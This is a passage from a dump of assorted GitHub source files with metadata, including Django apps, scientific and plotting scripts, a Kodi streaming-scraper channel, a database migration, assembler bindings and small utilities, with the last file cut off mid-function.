paginator.get_page(page_number)\n return render(request, 'listing.html', locals())\n\n\n# --------------------會員授權認證------------------\ndef get_member_data(request):\n try:\n current_user = request.user\n verified = EmailAddress.objects.filter(user=current_user).values()[0]\n verified = verified[\"verified\"]\n # print(f'當前使用者: {request.user}')\n # print(f'當前使用者信箱認��: {verified}')\n except Exception:\n verified = False\n return current_user, verified\n","repo_name":"appletime81/DjangoBookStore","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38447076059","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nmap = Basemap(projection='ortho', \n lat_0=0, lon_0=0)\n\nmap.drawmapboundary(fill_color='aqua')\nmap.fillcontinents(color='#cc9955',lake_color='aqua')\nmap.drawcoastlines()\n\nlon = 3.4\nlat = 3.4\n\nx, y = map(lon, lat)\n\nplt.text(x, y, 'Lagos',fontsize=12,fontweight='bold',\n ha='left',va='bottom',color='k')\n\nlon = 2.1\nlat = 41.\n\nx, y = map(lon, lat)\n\nplt.text(x, y, 'Barcelona',fontsize=12,fontweight='bold',\n ha='left',va='center',color='k',\n bbox=dict(facecolor='b', alpha=0.2))\nplt.show()","repo_name":"rveciana/BasemapTutorial","sub_path":"code_examples/plotting_data/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"17658123904","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nimport uuid\n\n\n# Create your models here.\n\nclass User(AbstractUser):\n email = models.EmailField(unique=True, null=True)\n\n id = models.UUIDField(default=uuid.uuid4, unique = True, \n primary_key=True, editable=False)\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = ['username']\n\nclass Event(models.Model):\n name = models.CharField(max_length=100)\n description = models.TextField(null=True, blank=True)\n CATEGORY_CHOICES = [\n ('music', 'Music'),\n ('health', 'Health'),\n ('tech', 'Tech'),\n ('hobbies', 'Hobbies'),\n ('business', 'Business'),\n ('sports', 'Sports'),\n ('food', 'Food and Eat'),\n ('arts', 'Visual Arts'),\n ]\n category = models.CharField(max_length=10, choices=CATEGORY_CHOICES, default='Music')\n location = models.CharField(max_length=100)\n price = models.DecimalField(max_digits=6, decimal_places=2, default='0.00')\n date_time = models.DateTimeField()\n featured_image = models.ImageField(blank=True, null=True, default=\"/images/default.jpg\")\n creator = models.ForeignKey(User, on_delete=models.CASCADE, related_name='events_created')\n attendees = models.ManyToManyField(User, through='Registration', related_name='events_attending')\n id = models.UUIDField(default=uuid.uuid4, unique = True, \n primary_key=True, editable=False)\n\n \n def __str__(self):\n return self.name\n\n\nclass Registration(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n event = models.ForeignKey(Event, on_delete=models.CASCADE)\n name = models.CharField(max_length=100)\n email = models.EmailField(null=True)\n id = models.UUIDField(default=uuid.uuid4, unique = True, \n primary_key=True, editable=False)\n\n class Meta:\n unique_together = ('user', 'event')\n\n #Function to know attendees that registered\n def __str__(self):\n return f\"{self.name} ({self.email}) registered for {self.event.name}\"\n\n","repo_name":"amanlikemurphy/Cloud-based-Event-Management-Project","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14554444878","text":"import numpy as np\r\nimport scipy.sparse as sp\r\nimport torch\r\nimport scipy.io as sio\r\nimport random\r\nimport pandas as pd\r\ndef load_anomaly_detection_dataset(dataset, datadir,sample_density,sample_size):\r\n\r\n\tdata_mat = sio.loadmat(f'{datadir}/{dataset}.mat')\r\n\tadj = data_mat['Network']\r\n\tfeat = data_mat['Attributes'].astype(float)\r\n\tLabel =pd.DataFrame(data_mat['Label'])\r\n\tnormal=np.empty(0)\r\n\tfor i in range(1,Label.size):\r\n\t\tnormal=np.append(normal,i)\r\n\tsuspicious = np.empty(0)\r\n\tfor i in range(0,int(sample_density*sample_size)):\r\n\t\tsuspicious_a=Label.index[Label[0]==1].tolist() \r\n\t\tr=random.randrange(len(suspicious_a))\r\n\t\tsuspicious=np.append(suspicious,suspicious_a[r])\r\n\t\tnormal=np.delete(normal,np.argwhere(normal==suspicious_a[r]))\r\n\tfor i in range(0,int(sample_size-sample_density*sample_size)):\r\n\t\tsuspicious_n=Label.index[Label[0]==0].tolist() \r\n\t\tr=random.randrange(len(suspicious_n))\r\n\t\tsuspicious=np.append(suspicious,suspicious_n[r])\r\n\t\tnormal=np.delete(normal,np.argwhere(normal==suspicious_n[r]))\r\n\t# suspicious = data_mat['Suspicious']\r\n\t# normal = data_mat['Normal']\r\n\t#truth= np.take_along_axis(truth,suspicious.astype(int),axis=0)\r\n\t# truth = truth.flatten()\r\n\r\n\tadj_norm = normalize_adj(adj + sp.eye(adj.shape[0]))\r\n\tadj_norm = adj_norm.toarray()\r\n\tadj = adj + sp.eye(adj.shape[0])\r\n\tadj=adj\r\n\t# print(feat)\r\n\t#feat = feat/feat.max(axis=0)\r\n\t# print(feat)\r\n\treturn adj_norm, feat, np.array(Label[0]), adj, normal, suspicious\r\n\r\ndef normalize_adj(adj):\r\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\r\n adj = sp.coo_matrix(adj)\r\n rowsum = np.array(adj.sum(1))\r\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\r\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\r\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\r\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()","repo_name":"GILESBastien/Suspicious_EGC","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21132167443","text":"from ..BaseMesh import BaseMesh\nimport numpy as np\n\n\nclass CurveRectangularMesh(BaseMesh):\n\n def __init__(self, lx: float, nx: int, amp_x: float, ly: float, ny: int, amp_y: float, lz: float, nz: int, amp_z: float):\n super().__init__()\n\n self._lx = lx\n self._ly = ly\n self._lz = lz\n\n self._nx = nx\n self._ny = ny\n self._nz = nz\n\n self._amp_x = amp_x\n self._amp_y = amp_y\n self._amp_z = amp_z\n\n self._create_grid()\n\n def _create_grid(self):\n\n self._node_number = self._nx*self._ny*self._nz\n self._mesh_size = (self._nx, self._ny, self._nz)\n\n x = np.linspace(0, self._lx, self._nx)\n y = np.linspace(0, self._ly, self._ny)\n z = np.linspace(0, self._lz, self._nz)\n\n self._x, self._y, self._z = np.meshgrid(x, y, z, indexing='ij')\n\n for i in range(len(self._x[0, 0, :])):\n self._x[:, :, i] += self._amp_x*np.sin(self._z[0, 0, i]*3.14)\n\n for i in range(len(self._y[:, 0, 0])):\n self._y[i, :, :] += self._amp_y*np.sin(self._x[i, 0, 0]*3.14)\n\n for i in range(len(self._z[0, :, 0])):\n self._z[:, i, :] += self._amp_z*np.sin(self._y[0, i, 0]*3.14)\n","repo_name":"BingHanLin/Curvilinear_Grid_FDM","sub_path":"CUR_GRID_FDM/Geometry/BasicGeometry/CurveRectangularMesh.py","file_name":"CurveRectangularMesh.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14401217163","text":"# Converting audio files to spectrogram\nfrom os import path, listdir\nimport matplotlib.pyplot as plt\nimport librosa\nimport librosa.display\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nDATA_ROOT = \"../input\"\n\ndef image_generator(audio_file_name, train = None):\n if train:\n audio_file_path = path.join(DATA_ROOT, \"my_train\", \"train_audio\", audio_file_name)\n else:\n audio_file_path = path.join(DATA_ROOT, \"test_data\", \"test_audio\", audio_file_name)\n\n x, sr = librosa.load(audio_file_path, sr=32000)\n X = librosa.stft(x) # for FFT\n Xdb = librosa.amplitude_to_db(abs(X))\n fig = plt.figure(figsize=(14, 14))\n librosa.display.specshow(Xdb, sr = sr, x_axis = \"time\", y_axis = \"hz\")\n plt.axis(\"off\")\n plt.close(fig) # Save images without displaying\n\n image_name = audio_file_name.split(\".\")[0]\n if train:\n fig.savefig(path.join(DATA_ROOT, \"my_train\", \"train_images\",image_name + \".png\"), bbox_inches='tight')\n else:\n fig.savefig(path.join(DATA_ROOT, \"test_data\", \"test_images\",image_name + \".png\"), bbox_inches='tight')\n\n\ntrain_images_list = listdir(path.join(DATA_ROOT, \"my_train\", \"train_audio\"))\ntest_images_list = listdir(path.join(DATA_ROOT, \"test_data\", \"test_audio\"))\n\nfor name in train_images_list:\n image_generator(name, train = True)\nfor name in test_images_list:\n image_generator(name, train = False)","repo_name":"Rishabhdhiman09/Repo-for-BirdCall-Identification","sub_path":"src/audioImage.py","file_name":"audioImage.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18533146028","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------\n# streamondemand.- XBMC Plugin\n# Canale per cineblog01 - anime\n# http://www.mimediacenter.info/foro/viewforum.php?f=36\n# ------------------------------------------------------------\nimport re\n\nfrom core import config, httptools\nfrom platformcode import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\n\n__channel__ = \"cb01anime\"\n\nhost = \"http://www.cineblog01.video\"\n\n\n# -----------------------------------------------------------------\ndef mainlist(item):\n logger.info(\"[cb01anime.py] mainlist\")\n\n # Main options\n itemlist = [Item(channel=__channel__,\n action=\"list_titles\",\n title=\"[COLOR azure]Anime - Novita'[/COLOR]\",\n url=\"%s/anime/\" % host,\n thumbnail=\"http://orig09.deviantart.net/df5a/f/2014/169/2/a/fist_of_the_north_star_folder_icon_by_minacsky_saya-d7mq8c8.png\"),\n Item(channel=__channel__,\n action=\"genere\",\n title=\"[COLOR azure]Anime - Per Genere[/COLOR]\",\n url=\"%s/anime/\" % host,\n thumbnail=\"http://xbmc-repo-ackbarr.googlecode.com/svn/trunk/dev/skin.cirrus%20extended%20v2/extras/moviegenres/Genres.png\"),\n Item(channel=__channel__,\n action=\"alfabetico\",\n title=\"[COLOR azure]Anime - Per Lettera A-Z[/COLOR]\",\n url=\"%s/anime/\" % host,\n thumbnail=\"http://i.imgur.com/IjCmx5r.png\"),\n Item(channel=__channel__,\n action=\"listacompleta\",\n title=\"[COLOR azure]Anime - Lista Completa[/COLOR]\",\n url=\"%s/anime/lista-completa-anime-cartoon/\" % host,\n thumbnail=\"http://i.imgur.com/IjCmx5r.png\"),\n Item(channel=__channel__,\n action=\"search\",\n title=\"[COLOR yellow]Cerca Anime[/COLOR]\",\n extra=\"anime\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\")]\n\n return itemlist\n\n\n# =================================================================\n\n# -----------------------------------------------------------------\ndef genere(item):\n logger.info(\"[cb01anime.py] genere\")\n \n return build_itemlist(item,'<select name=\"select2\"(.*?)</select>','<option value=\"([^\"]+)\">([^<]+)</option>',\"list_titles\")\n\ndef alfabetico(item):\n logger.info(\"[cb01anime.py] alfabetico\")\n\n return build_itemlist(item,'<option value=\\'-1\\'>Anime per Lettera</option>(.*?)</select>','<option value=\"([^\"]+)\">\\(([^<]+)\\)</option>',\"list_titles\")\n\ndef listacompleta(item):\n logger.info(\"[cb01anime.py] listacompleta\")\n\n return build_itemlist(item,'<a href=\"#char_5a\" title=\"Go to the letter Z\">Z</a></span></div>(.*?)</ul></div><div style=\"clear:both;\"></div></div>',\n '<li><a href=\"' + host + '([^\"]+)\"><span class=\"head\">([^<]+)</span></a></li>',\"episodios\")\n \n\ndef build_itemlist(item,re_bloque,re_patron,iaction):\n itemlist = []\n\n data = httptools.downloadpage(item.url).data\n\n # Narrow search by selecting only the combo\n bloque = scrapertools.get_match(data, re_bloque)\n\n # The categories are the options for the combo\n matches = re.compile(re_patron, re.DOTALL).findall(bloque)\n scrapertools.printMatches(matches)\n\n for url, titulo in matches:\n itemlist.append(\n Item(channel=__channel__,\n action=iaction,\n fulltitle=titulo,\n show=titulo,\n title=titulo,\n url=host + url,\n plot=\"\"))\n return itemlist\n \n \n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef search(item, texto):\n logger.info(\"[cb01anime.py] \" + item.url + \" search \" + texto)\n\n item.url = host + \"/anime/?s=\" + texto\n\n return list_titles(item)\n\n\n# =================================================================\n\n# -----------------------------------------------------------------\ndef list_titles(item):\n logger.info(\"[cb01anime.py] mainlist\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n\n # Estrae i contenuti \n patronvideos = '<div class=\"span4\"> <a.*?<img src=\"(.*?)\".*?'\n patronvideos += '<div class=\"span8\">.*?<a href=\"(.*?)\">.*?'\n patronvideos += '<h1>(.*?)</h1></a>.*?<br />(.*?)<br>.*?'\n matches = re.compile(patronvideos, re.DOTALL).finditer(data)\n\n for match in matches:\n scrapedthumbnail = match.group(1)\n scrapedurl = match.group(2)\n scrapedtitle = scrapertools.unescape(match.group(3))\n scrapedplot = scrapertools.unescape(match.group(4))\n scrapedplot = scrapertools.decodeHtmlentities(scrapedplot)\n if scrapedplot.startswith(\"\"):\n scrapedplot = scrapedplot[64:]\n\n ## ------------------------------------------------\n scrapedthumbnail = httptools.get_url_headers(scrapedthumbnail)\n ## ------------------------------------------------ \n\n # Añade al listado de XBMC\n itemlist.append(\n Item(channel=__channel__,\n action=\"listacompleta\" if scrapedtitle == \"Lista Alfabetica Completa Anime/Cartoon\" else \"episodios\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=scrapedtitle,\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n viewmode=\"movie_with_plot\",\n plot=scrapedplot))\n\n # Put the next page mark\n try:\n next_page = scrapertools.get_match(data, \"<link rel='next' href='([^']+)'\")\n itemlist.append(\n Item(channel=__channel__,\n action=\"HomePage\",\n title=\"[COLOR yellow]Torna Home[/COLOR]\",\n folder=True)),\n itemlist.append(\n Item(channel=__channel__,\n action=\"list_titles\",\n title=\"[COLOR orange]Successivo>>[/COLOR]\",\n url=next_page,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\"))\n except:\n pass\n\n return itemlist\n\n\n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef episodios(item):\n logger.info(\"[cb01anime.py] episodios\")\n\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n\n patron1 = '(?:<p>|<td bgcolor=\"#ECEAE1\">)<span class=\"txt_dow\">(.*?)(?:</p>)?(?:\\s*</span>)?\\s*</td>'\n patron2 = '<a.*?href=\"([^\"]+)\"[^>]*>([^<]+)</a>'\n matches1 = re.compile(patron1, re.DOTALL).findall(data)\n if len(matches1) > 0:\n for match1 in re.split('<br />|<p>', matches1[0]):\n if len(match1) > 0:\n # Estrae i contenuti \n titulo = None\n scrapedurl = ''\n matches2 = re.compile(patron2, re.DOTALL).finditer(match1)\n for match2 in matches2:\n if titulo is None:\n titulo = match2.group(2)\n scrapedurl += match2.group(1) + '#' + match2.group(2) + '|'\n if titulo is not None:\n title = item.title + \" \" + titulo\n itemlist.append(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"episode\",\n title=title,\n extra=scrapedurl,\n fulltitle=item.fulltitle,\n show=item.show))\n\n if config.get_library_support() and len(itemlist) != 0:\n itemlist.append(\n Item(channel=__channel__,\n title=\"Aggiungi alla libreria\",\n url=item.url,\n action=\"add_serie_to_library\",\n extra=\"episodios\",\n show=item.show))\n\n return itemlist\n\n\n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef findvideos(item):\n logger.info(\"[cb01anime.py] findvideos\")\n\n itemlist = []\n\n for match in item.extra.split(r'|'):\n match_split = match.split(r'#')\n scrapedurl = match_split[0]\n if len(scrapedurl) > 0:\n scrapedtitle = match_split[1]\n title = item.title + \" [COLOR blue][\" + scrapedtitle + \"][/COLOR]\"\n itemlist.append(\n Item(channel=__channel__,\n action=\"play\",\n title=title,\n url=scrapedurl,\n fulltitle=item.fulltitle,\n show=item.show,\n folder=False))\n\n return itemlist\n\n\n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef play(item):\n logger.info(\"[cb01anime.py] play\")\n\n if '/goto/' in item.url:\n item.url = item.url.split('/goto/')[-1].decode('base64')\n data = item.url\n\n\n ## All following code is redundant for anime\n# item.url = item.url.replace('http://cineblog01.pw', 'http://k4pp4.pw')\n\n# if \"go.php\" in item.url:\n# data = httptools.downloadpage(item.url).data\n# try:\n# data = scrapertools.get_match(data, 'window.location.href = \"([^\"]+)\";')\n# except IndexError:\n# try:\n# # data = scrapertools.get_match(data, r'<a href=\"([^\"]+)\">clicca qui</a>')\n# # In alternativa, dato che a volte compare \"Clicca qui per proseguire\":\n# data = scrapertools.get_match(data, r'<a href=\"([^\"]+)\".*?class=\"btn-wrapper\">.*?licca.*?</a>')\n# except IndexError:\n# data = httptools.downloadpage(item.url, only_headers=True, follow_redirects=False).headers.get(\"location\", \"\")\n# while 'vcrypt' in data:\n# data = httptools.downloadpage(data, only_headers=True, follow_redirects=False).headers.get(\"location\", \"\")\n# logger.debug(\"##### play go.php data ##\\n%s\\n##\" % data)\n# elif \"/link/\" in item.url:\n# data = httptools.downloadpage(item.url).data\n# from lib import jsunpack\n#\n# try:\n# data = scrapertools.get_match(data, \"(eval\\(function\\(p,a,c,k,e,d.*?)</script>\")\n# data = jsunpack.unpack(data)\n# logger.debug(\"##### play /link/ unpack ##\\n%s\\n##\" % data)\n# except IndexError:\n# logger.debug(\"##### The content is yet unpacked ##\\n%s\\n##\" % data)\n#\n# data = scrapertools.find_single_match(data, 'var link(?:\\s)?=(?:\\s)?\"([^\"]+)\";')\n# while 'vcrypt' in data:\n# data = httptools.downloadpage(data, only_headers=True, follow_redirects=False).headers.get(\"location\", \"\")\n# if data.startswith('/'):\n# data = urlparse.urljoin(\"http://swzz.xyz\", data)\n# data = httptools.downloadpage(data, headers=headers).data\n# logger.debug(\"##### play /link/ data ##\\n%s\\n##\" % data)\n \n\n try:\n logger.debug(\"##### Play data ##\\n%s\\n##\" % data)\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n videoitem.title = item.show\n videoitem.fulltitle = item.fulltitle\n videoitem.show = item.show\n videoitem.thumbnail = item.thumbnail\n videoitem.channel = __channel__\n except AttributeError:\n logger.error(\"vcrypt data doesn't contain expected URL\")\n\n return itemlist\n\n\ndef HomePage(item):\n import xbmc\n xbmc.executebuiltin(\"ReplaceWindow(10024,plugin://plugin.video.streamondemand)\")\n","repo_name":"kodirepositoryluxy/KM17_15.01.18-2","sub_path":"addons/temp/7f2aab45-9907-4492-8741-fac27e7e9ac8/channels/cb01anime.py","file_name":"cb01anime.py","file_ext":"py","file_size_in_byte":12036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39220908290","text":"\"\"\"empty message\n\nRevision ID: c355ed6f4dbb\nRevises: ca286a811fcb\nCreate Date: 2020-09-18 18:13:44.202581\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c355ed6f4dbb'\ndown_revision = 'ca286a811fcb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('artist_genres',\n sa.Column('artist_id', sa.Integer(), nullable=False),\n sa.Column('genre_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['artist_id'], ['Artist.id'], ),\n sa.ForeignKeyConstraint(['genre_id'], ['Genre.id'], ),\n sa.PrimaryKeyConstraint('artist_id', 'genre_id')\n )\n op.add_column('Artist', sa.Column('seeking_description', sa.String(length=500), nullable=True))\n op.add_column('Artist', sa.Column('seeking_venue', sa.Boolean(), nullable=True))\n op.add_column('Artist', sa.Column('website', sa.String(length=120), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Artist', 'website')\n op.drop_column('Artist', 'seeking_venue')\n op.drop_column('Artist', 'seeking_description')\n op.drop_table('artist_genres')\n # ### end Alembic commands ###\n","repo_name":"ameernasser88/Fyyur","sub_path":"migrations/versions/c355ed6f4dbb_.py","file_name":"c355ed6f4dbb_.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22823857426","text":"from django.urls import path\r\nfrom . import views\r\n\r\n\r\napp_name= 'food'\r\n\r\nurlpatterns = [\r\n path('greet/', views.greet, name='greet'),\r\n path('process/', views.process,name='process'),\r\n path('', views.item,name=\"item\"),\r\n path('<int:item_id>/', views.detail, name='detail'),\r\n path('add/', views.add_item,name=\"add_item\"),\r\n path('update/<int:id>/', views.update_item,name=\"update_item\"),\r\n path('delete/<int:id>/', views.delete_item,name=\"delete_item\"),\r\n \r\n \r\n]\r\n","repo_name":"sabakhan-cpu/food_app","sub_path":"FOODSITE_PROJECT/food/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24275564252","text":"import os\nimport sys\nimport logging\nfrom datetime import date, timedelta\n\nimport gspread_authorize\nimport yandex_data\nimport yandex_data_regions\n\n\ndef get_yesterday_date():\n \"\"\" Get yesterday dates. \"\"\"\n\n delta = timedelta(days=1)\n return (date.today() - delta).strftime('%d/%m/%Y')\n\n\ndef write_to_spreadsheet(period, regions=None):\n \"\"\"period: str 'TODAY' or 'YESTERDAY' \"\"\"\n\n logging.basicConfig(\n filename=f'{period}.log',\n level=logging.INFO,\n format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %H:%M:%S'\n )\n\n gc = gspread_authorize.authorize()\n\n if regions:\n sheet = f'Regions {period}'\n worksheet = gspread_authorize.open_sheet(\n gc, os.getenv('SPREADSHEET_INCOME'), sheet\n )\n\n print(worksheet)\n\n if period == 'hourly':\n ya_spend = yandex_data_regions.get_expenses('TODAY')\n date_column = worksheet.cell(2, 1).value.split()\n today = date.today().strftime('%d.%m')\n if today in date_column:\n cell_shift = 7\n for i in ya_spend:\n worksheet.update_cell(2, cell_shift, ya_spend[i])\n cell_shift += 3\n\n if period == 'daily':\n ya_spend = yandex_data_regions.get_expenses('YESTERDAY')\n yesterday = get_yesterday_date()\n date_cell = worksheet.find('{}'.format(yesterday))\n if date_cell:\n cell_shift = 7\n for i in ya_spend:\n worksheet.update_cell(date_cell.row, cell_shift, ya_spend[i])\n cell_shift += 3\n\n else:\n worksheet = gspread_authorize.open_sheet(\n gc, os.getenv('SPREADSHEET_INCOME'), period\n )\n\n print(worksheet)\n\n if period == 'hourly':\n ya_spend = yandex_data.get_expenses('TODAY')\n date_column = worksheet.cell(2, 1).value.split()\n today = date.today().strftime('%d.%m')\n if today in date_column:\n worksheet.update_cell(2, 5, ya_spend)\n\n if period == 'daily':\n ya_spend = yandex_data.get_expenses('YESTERDAY')\n yesterday = get_yesterday_date()\n date_cell = worksheet.find('{}'.format(yesterday))\n if date_cell:\n worksheet.update_cell(date_cell.row, 10, ya_spend)\n\n\nif __name__ == '__main__':\n period = sys.argv[1]\n try:\n regions = sys.argv[2]\n except IndexError:\n regions = None\n write_to_spreadsheet(period, regions)\n","repo_name":"iakovleva/vu_yandex","sub_path":"vu_income/yandex.py","file_name":"yandex.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13925148970","text":"# 남학생일때 스위치 번호가 자기가 받은 수의 배수이면 그 스위치의 상태를 바꾼다\n# 여학생은 자기가 받은 수와 같은 번호가 붙은 스위치를 중심으로 좌우가 대칭이면서 가장 많은\n# 스위치를 포함하는 구간을 찾아서 그 구간에 속한 스위치의 상태를 모두 바꾼다\n# 이때 구간에 속한 스위치 개수는 항상 홀수가 된다 ???????????????????????????????????\n\n\n\n\nn = int(input()) # 스위치 개수\nstates = list(map(int, input().split()))\n# 남 : 1 , 여 : 2\nnums = int(input()) # 학생 수\nlst = []\nfor i in range(nums):\n st, k = map(int, input().split())\n lst.append(st)\n lst.append(k)\n\nfor i in range(nums): # 0 1\n if lst[2*i] == 1:\n a = lst[2*i+1] # 3\n for j in range(len(states)): # 0 1 2 3 4 5 6 7\n if j % a == 0 and j != 0:\n if states[j-1] == 1:\n states[j-1] = 0\n elif states[j-1] == 0:\n states[j-1] = 1\n elif lst[2*i] == 2:\n a = lst[2*i+1] # 3\n if states[a-1] == 0:\n states[a-1] = 1\n else:\n states[a-1] = 0\n\n idx = []\n for z in range(len(states)//2): # 0 1 2 3\n if 0 <= a-z-2 or n > a+z: ## z 가 2 일때 a-z-2 가 -1 이 되어서 0 <= -1 조건문에 들어가면 안되는데 왜 들어가는거졍?\n if states[a-2-z] != states[a+z]:\n if states[a-1] == 1:\n states[a-1] = 0\n elif states[a-1] == 0:\n states[a-1] = 1\n elif states[a-2-z] == states[a+z]:\n idx.append(a-2-z)\n idx.append(a+z)\n else:\n for j in range(idx[0], idx[-1]+1):\n if states[j] == 1:\n states[j] = 0\n elif states[j] == 0:\n states[j] = 1\n else:\n for j in range(idx[0], idx[-1]+1):\n if states[j] == 1:\n states[j] = 0\n elif states[j] == 0:\n states[j] = 1\n\nprint(states)\n\n\n","repo_name":"seongbiny/algorithm","sub_path":"BOJ/1244.py","file_name":"1244.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25564405062","text":"from ctypes import *\n\nXEDPARSE_MAXBUFSIZE = 256\nXEDPARSE_MAXASMSIZE = 16\n\nXEDPARSE_ERROR = 0\nXEDPARSE_OK = 1\n\nclass XEDPARSE(Structure):\n _pack_= 8\n _fields_ = [(\"x64\", c_bool),\n (\"cip\", c_ulonglong),\n (\"dest_size\", c_uint),\n (\"cbUnknown\", c_void_p),\n (\"dest\", c_char * XEDPARSE_MAXASMSIZE),\n (\"instr\", c_char * XEDPARSE_MAXBUFSIZE),\n (\"error\", c_char * XEDPARSE_MAXBUFSIZE)\n ]\n\nimport os\nif os.name == 'nt':\n __module = CDLL('XEDParse')\nelif os.name == 'posix':\n __module = CDLL('libXEDParse.so')\n \nXEDParseAssemble = __module.XEDParseAssemble","repo_name":"x64dbg/XEDParse","sub_path":"bindings/XEDParsePython.py","file_name":"XEDParsePython.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"37"} +{"seq_id":"22930956933","text":"# Takes a genePred formatted tsv\n# Outpus only the longest isoform for each gene_id in genePred format to stdout\n\nfrom collections import defaultdict\nfrom sys import argv\n\nscript, inputFile = argv\n\n# Hold length of each transcript\nlongest = defaultdict(lambda: 0)\nlongest_name = defaultdict(lambda: '')\n\nf = open(inputFile, 'r')\n\nfor line in f:\n\tline = line.strip().split('\\t')\n\tlength = 0\n\tname1 = line[1]\n\tname2 = line[12]\n\texon_starts = line[9].rstrip(',').split(',')\n\texon_ends = line[10].rstrip(',').split(',')\n\tfor start, end in zip(exon_starts, exon_ends):\n\t\tlength += (int(end) - int(start))\n\n\tif length > longest[name2]:\n\t\tlongest[name2] = length\n\t\tlongest_name[name2] = name1\nf.close()\n\nf = open(inputFile, 'r')\nfor line in f:\n\tline = line.strip()\n\tl = line.split('\\t')\n\tname1 = l[1]\n\tname2 = l[12]\n\tif longest_name[name2] == name1:\n\t\tprint(line)\n\t\nf.close()\t\n\n\n","repo_name":"alexpan82/bioinformatics_scripts","sub_path":"gen_util/genePred_longestIso.py","file_name":"genePred_longestIso.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36730909853","text":"import socket\r\nimport random\r\n\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = '127.0.0.1'\r\nport = 12345\r\ns.gettimeout()\r\ns.connect((host, port))\r\nmessage = str(random.randint(1,4))\r\ns.send(message.encode())\r\ndata = s.recv(1024)\r\nprint('Got data from server: {}'. format(data.decode()))\r\ns.close()","repo_name":"barrygg/Study","sub_path":"Practice/SQLLite/Server/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73682947626","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport os.path\nfrom PIL import Image\n\ndst_mask_ = [0x01, 0x02 , 0x04 ,0x08,0x10 ,0x20,0x40,0x80]\n\ndef Image2FrameBuf(fileName) :\n img = Image.open(fileName).convert(\"1\")\n (w,h) = img.size\n if w > 128 or h > 32 :\n print(\"Too Large %d,%d\\n\" % (w,h))\n return\n varname = os.path.splitext(os.path.basename(fileName))[0]\n DRAM_V_FB = [0] * 512\n for y in xrange(h):\n for x in xrange(w):\n if img.getpixel((x,y )) == 0 :\n DRAM_V_FB[(x) + ((y) >> 3 ) * 128] |= dst_mask_[(y) & 0x7]\n\n print(\"static const unsigned char %s_Img[] = {\" % (varname) )\n for x in xrange(512):\n if x % 16 == 0 :\n print(\"\")\n print(\"\\t\" , end='' )\n 